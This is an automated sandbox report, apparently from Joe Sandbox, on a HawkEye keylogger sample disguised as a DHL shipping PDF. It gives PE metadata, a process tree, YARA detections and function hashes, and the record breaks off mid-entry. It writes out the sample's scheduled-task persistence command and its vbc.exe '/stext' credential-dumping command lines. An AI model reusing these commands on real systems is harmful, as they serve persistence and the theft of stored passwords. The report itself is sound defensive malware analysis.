                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al

                                                                                                                                                                Data Directories

                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x1086940x57.text
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x10a0000x618.rsrc
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x10c0000xc.reloc
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                Sections

                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                .text0x20000x1066f40x106800False0.874490327381data7.77724876545IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                .rsrc0x10a0000x6180x800False0.33935546875data3.47597490494IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                .reloc0x10c0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                Resources

                                                                                                                                                                NameRVASizeTypeLanguageCountry
                                                                                                                                                                RT_VERSION0x10a0a00x388data
                                                                                                                                                                RT_MANIFEST0x10a4280x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                                                                                                Imports

                                                                                                                                                                DLLImport
                                                                                                                                                                mscoree.dll_CorExeMain

                                                                                                                                                                Version Infos

                                                                                                                                                                DescriptionData
                                                                                                                                                                Translation0x0000 0x04b0
                                                                                                                                                                LegalCopyrightCopyright 2015
                                                                                                                                                                Assembly Version2.0.1.0
                                                                                                                                                                InternalNameKeyedHashAlgorit.exe
                                                                                                                                                                FileVersion2.0.1.0
                                                                                                                                                                CompanyNamereblGreen Software Ltd
                                                                                                                                                                LegalTrademarks
                                                                                                                                                                Comments
                                                                                                                                                                ProductNameDimWin Brightness
                                                                                                                                                                ProductVersion2.0.1.0
                                                                                                                                                                FileDescriptionDimWin Brightness
                                                                                                                                                                OriginalFilenameKeyedHashAlgorit.exe

                                                                                                                                                                Network Behavior

                                                                                                                                                                No network behavior found

                                                                                                                                                                Code Manipulations

                                                                                                                                                                Statistics

                                                                                                                                                                CPU Usage

                                                                                                                                                                Click to jump to process

                                                                                                                                                                Memory Usage

                                                                                                                                                                Click to jump to process

                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                Behavior

                                                                                                                                                                Click to jump to process

                                                                                                                                                                System Behavior

                                                                                                                                                                Analysis Process: DHL_AWB 518877882999_887755468_pdf.exe PID: 2172 Parent PID: 5960

                                                                                                                                                                General

                                                                                                                                                                Start time:17:08:48
                                                                                                                                                                Start date:13/10/2021
                                                                                                                                                                Path:C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe'
                                                                                                                                                                Imagebase:0xf40000
                                                                                                                                                                File size:1078272 bytes
                                                                                                                                                                MD5 hash:7D11E82579E2A0628CA3C855AFE34FD1
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000000.00000002.290657795.000000000536D000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.290657795.000000000536D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.285852957.0000000003419000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000000.00000002.289479199.0000000004E84000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.289479199.0000000004E84000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                Reputation:low

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: schtasks.exe PID: 5984 Parent PID: 2172

                                                                                                                                                                General

                                                                                                                                                                Start time:17:09:01
                                                                                                                                                                Start date:13/10/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cmsyNzu' /XML 'C:\Users\user\AppData\Local\Temp\tmp70BF.tmp'
                                                                                                                                                                Imagebase:0xa30000
                                                                                                                                                                File size:185856 bytes
                                                                                                                                                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: conhost.exe PID: 3584 Parent PID: 5984

                                                                                                                                                                General

                                                                                                                                                                Start time:17:09:01
                                                                                                                                                                Start date:13/10/2021
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff774ee0000
                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: DHL_AWB 518877882999_887755468_pdf.exe PID: 2960 Parent PID: 2172

                                                                                                                                                                General

                                                                                                                                                                Start time:17:09:01
                                                                                                                                                                Start date:13/10/2021
                                                                                                                                                                Path:C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe
                                                                                                                                                                Imagebase:0xe60000
                                                                                                                                                                File size:1078272 bytes
                                                                                                                                                                MD5 hash:7D11E82579E2A0628CA3C855AFE34FD1
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000007.00000002.525571222.000000000330E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 00000007.00000002.528296707.0000000007D90000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000007.00000002.528296707.0000000007D90000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000007.00000002.528296707.0000000007D90000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000007.00000002.526864554.00000000041F5000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000007.00000002.526864554.00000000041F5000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000007.00000002.517940589.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000007.00000002.517940589.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000007.00000003.278922139.0000000004A65000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000007.00000003.278922139.0000000004A65000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                Reputation:low

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: vbc.exe PID: 5232 Parent PID: 2960

                                                                                                                                                                General

                                                                                                                                                                Start time:17:09:07
                                                                                                                                                                Start date:13/10/2021
                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp1B0D.tmp'
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:1171592 bytes
                                                                                                                                                                MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                Reputation:high

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: vbc.exe PID: 6168 Parent PID: 2960

                                                                                                                                                                General

                                                                                                                                                                Start time:17:10:10
                                                                                                                                                                Start date:13/10/2021
                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp11A3.tmp'
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:1171592 bytes
                                                                                                                                                                MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                Reputation:high

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Disassembly

                                                                                                                                                                Code Analysis

                                                                                                                                                                Reset < >

                                                                                                                                                                  Analysis Process: DHL_AWB 518877882999_887755468_pdf.exe PID: 2172 Parent PID: 5960 DHL_AWB 518877882999_887755468_pdf.exeCOMMON

                                                                                                                                                                  Executed Functions

                                                                                                                                                                  Function 019A3159, Relevance: .3, Instructions: 338COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.285037104.00000000019A0000.00000040.00000001.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: a4a8647002ead9d035ec9c84c8acba725da23b47385785931410141431ecde6d
                                                                                                                                                                  • Instruction ID: 5ca798502645677bba9f32fe206bba24d11af8c11a4727ad8346f599b7883e72
                                                                                                                                                                  • Opcode Fuzzy Hash: a4a8647002ead9d035ec9c84c8acba725da23b47385785931410141431ecde6d
                                                                                                                                                                  • Instruction Fuzzy Hash: D1E19B74E0420ACFCB18CFE9C4858AEFBB2FF89300B54995AC515AB244D735AA46CFD4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 019A3230, Relevance: .3, Instructions: 302COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.285037104.00000000019A0000.00000040.00000001.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 35574e439e4cd1a097fb99faad719e9f463bf49483f27451fc3f1c43fd5817aa
                                                                                                                                                                  • Instruction ID: f98a98d82ef90e507fbe2197f6a79e514cc257ab27eb499df54b791fb8cf026b
                                                                                                                                                                  • Opcode Fuzzy Hash: 35574e439e4cd1a097fb99faad719e9f463bf49483f27451fc3f1c43fd5817aa
                                                                                                                                                                  • Instruction Fuzzy Hash: 52D12A70E1420ADFCB14CFE9C4858AEFBB2FF89301B54D959C51AAB214D7349A46CF94
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 019A0FB9, Relevance: .2, Instructions: 250COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.285037104.00000000019A0000.00000040.00000001.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: e7a1d634a3f166abf27ad8eea5383efa70fc34804588be066a9a79341913e9b4
                                                                                                                                                                  • Instruction ID: 6c267b85fd747d575df6fc35064fe141127a618076a46457df83ac8157cb6c02
                                                                                                                                                                  • Opcode Fuzzy Hash: e7a1d634a3f166abf27ad8eea5383efa70fc34804588be066a9a79341913e9b4
                                                                                                                                                                  • Instruction Fuzzy Hash: 4AB10174E04219DFCB08CFE9D8849DEBBB2BF88310F14942AD429BB264DB359945CF94
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 019A1070, Relevance: .2, Instructions: 213COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.285037104.00000000019A0000.00000040.00000001.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: bcff334b88d5a91eda59bbf4ededded6580b34287eb634339880c5457ec9dca5
                                                                                                                                                                  • Instruction ID: d0076d09464d6406b6dcaa336178a9058fe675bd46acd9e3ddf041e396621285
                                                                                                                                                                  • Opcode Fuzzy Hash: bcff334b88d5a91eda59bbf4ededded6580b34287eb634339880c5457ec9dca5
                                                                                                                                                                  • Instruction Fuzzy Hash: 9491C074E042198FCB08CFEAC981AEEFBB2BF88300F14942AD519BB264D7749945CF54
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 019A23E1, Relevance: .1, Instructions: 83COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.285037104.00000000019A0000.00000040.00000001.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 20cc3b78bcdff8f9dd57b5f371fb1125edd4b34d61412f1f66bbea3ab24d3edf
                                                                                                                                                                  • Instruction ID: 0883d6e8bddf5385b93c361551d250434b26514ce7453aec8a2142654ca65700
                                                                                                                                                                  • Opcode Fuzzy Hash: 20cc3b78bcdff8f9dd57b5f371fb1125edd4b34d61412f1f66bbea3ab24d3edf
                                                                                                                                                                  • Instruction Fuzzy Hash: F7310571E01218CFDB29CFAAD9446DDBBB2BFC9300F14C1AAD809AB268DB355945CF50
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 019A0470, Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.285037104.00000000019A0000.00000040.00000001.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 8f6cbafd5a96abb3b303ad65dddc4b4aa6e54758303b67e751f56d02d7db480e
                                                                                                                                                                  • Instruction ID: 847aa52b3b21dfb7c226ea5160806ac8fb6c07f642123616976de5ee658facec
                                                                                                                                                                  • Opcode Fuzzy Hash: 8f6cbafd5a96abb3b303ad65dddc4b4aa6e54758303b67e751f56d02d7db480e
                                                                                                                                                                  • Instruction Fuzzy Hash: 4D21FD71E056188FEB59CF6BD84069EFBF7AFC9200F18C1BAD448A7225DB34094A8F51
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 058C45F9, Relevance: 6.1, APIs: 4, Instructions: 125threadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 058C4668
                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 058C46A5
                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 058C46E2
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 058C473B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.291607749.00000000058C0000.00000040.00000001.sdmp, Offset: 058C0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2063062207-0
                                                                                                                                                                  • Opcode ID: 1548f7062917456d4dd681ad48c9ad87485c362800ff692ec96519e402de5094
                                                                                                                                                                  • Instruction ID: cc623be289c8476cc0510e4756d72de435f9972e105e9792792830682a0bc018
                                                                                                                                                                  • Opcode Fuzzy Hash: 1548f7062917456d4dd681ad48c9ad87485c362800ff692ec96519e402de5094
                                                                                                                                                                  • Instruction Fuzzy Hash: 9D5158B090064A8FDB14CFA9D588BDEBFF4BF49314F148469E809A7360DB34A885CF65
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 058C4608, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 058C4668
                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 058C46A5
                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 058C46E2
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 058C473B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.291607749.00000000058C0000.00000040.00000001.sdmp, Offset: 058C0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2063062207-0
                                                                                                                                                                  • Opcode ID: 7c1b4330f70e43fa0d7f63ef33850d76271994eace54ab879630fb1279c7a2da
                                                                                                                                                                  • Instruction ID: 6aef993690213097307b8510e21e5c633d7f36ad46183ad95a8fa66f9d302925
                                                                                                                                                                  • Opcode Fuzzy Hash: 7c1b4330f70e43fa0d7f63ef33850d76271994eace54ab879630fb1279c7a2da
                                                                                                                                                                  • Instruction Fuzzy Hash: EF5158B090064A8FDB14CFA9D548BDEBFF4BF49314F148469E809A7350CB34A884CF65
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 058C8C80, Relevance: 1.8, APIs: 1, Instructions: 331COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.291607749.00000000058C0000.00000040.00000001.sdmp, Offset: 058C0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 7c059fcf8722399b269d490aa1f0de07c6b1d958b22895e42fbe40d6ab94e724
                                                                                                                                                                  • Instruction ID: 2fba3a908599217d76965e3e6474648b4cfc8bb7c16fc5c96917204f77d98b9f
                                                                                                                                                                  • Opcode Fuzzy Hash: 7c059fcf8722399b269d490aa1f0de07c6b1d958b22895e42fbe40d6ab94e724
                                                                                                                                                                  • Instruction Fuzzy Hash: E6C13670D09359DFCB12CFA4C880ACDBFB1BF0A300F19909AE448AB222D734A995CF15
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 058C21C8, Relevance: 1.7, APIs: 1, Instructions: 223COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNELBASE(?), ref: 058C243A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.291607749.00000000058C0000.00000040.00000001.sdmp, Offset: 058C0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                                  • Opcode ID: e3969a72b3fb8400a920987129dcb9dd9d9cafcc84c340da2c70378866f1f1c1
                                                                                                                                                                  • Instruction ID: 52a02b762328bea5d1624861c404b192101356247ccdb762ebdea92fc36d3921
                                                                                                                                                                  • Opcode Fuzzy Hash: e3969a72b3fb8400a920987129dcb9dd9d9cafcc84c340da2c70378866f1f1c1
                                                                                                                                                                  • Instruction Fuzzy Hash: 0691F474A007098FDB24DF69D584A9ABBF6BF48304F00896ED886E7B90D734E945CF91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 058C8DD8, Relevance: 1.7, APIs: 1, Instructions: 182COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 058C8F99
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.291607749.00000000058C0000.00000040.00000001.sdmp, Offset: 058C0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                                                  • Opcode ID: 72bc4fcdbf9dfa4c73706b1abf95a56ef3f3fe3d2706a957b3167ce75980196a
                                                                                                                                                                  • Instruction ID: d10838d146c6e0fec1d15963bfff71c27a5df926efc9f9fe5a5222195541de20
                                                                                                                                                                  • Opcode Fuzzy Hash: 72bc4fcdbf9dfa4c73706b1abf95a56ef3f3fe3d2706a957b3167ce75980196a
                                                                                                                                                                  • Instruction Fuzzy Hash: 36717AB4D04218DFDF20CFA9D984BDEBBB1BF09304F1491AAE908A7211D774AA85CF55
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 019AC394, Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 019AE189
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.285037104.00000000019A0000.00000040.00000001.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Create
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                                                  • Opcode ID: 8f91dd995d5f8e034115fd5f4af1aa66a72d466e6169a89e2013061a43c8d890
                                                                                                                                                                  • Instruction ID: 9e2d7885ce78324af7fb7530038bf97f31df6f2f3e38011970fc6f7cd7db5dd8
                                                                                                                                                                  • Opcode Fuzzy Hash: 8f91dd995d5f8e034115fd5f4af1aa66a72d466e6169a89e2013061a43c8d890
                                                                                                                                                                  • Instruction Fuzzy Hash: 7551E475D0022CCFDB24DFA5C884BDEBBB9BF49304F5084A9D509AB250DB716A89CF91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 058C90BF, Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetWindowLongW.USER32(?,?,?), ref: 058C918E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.291607749.00000000058C0000.00000040.00000001.sdmp, Offset: 058C0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LongWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1378638983-0
                                                                                                                                                                  • Opcode ID: 122cca36cda8dd88f937d0bc5222e9ef8f82a08f723874c3c43089edf003f0ae
                                                                                                                                                                  • Instruction ID: 40545837fbfdd1ae401668e6b358b3483689197ed2a0f7a13afb73ba3f9edac8
                                                                                                                                                                  • Opcode Fuzzy Hash: 122cca36cda8dd88f937d0bc5222e9ef8f82a08f723874c3c43089edf003f0ae
                                                                                                                                                                  • Instruction Fuzzy Hash: D341DCB5D01248EFCB11CFA9E984ADDBBF5BF09310F1484AAE804AB211D335A955CFA0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 058C4C38, Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 058C4D03
                                                                                                                                                                  Memory Dump Source
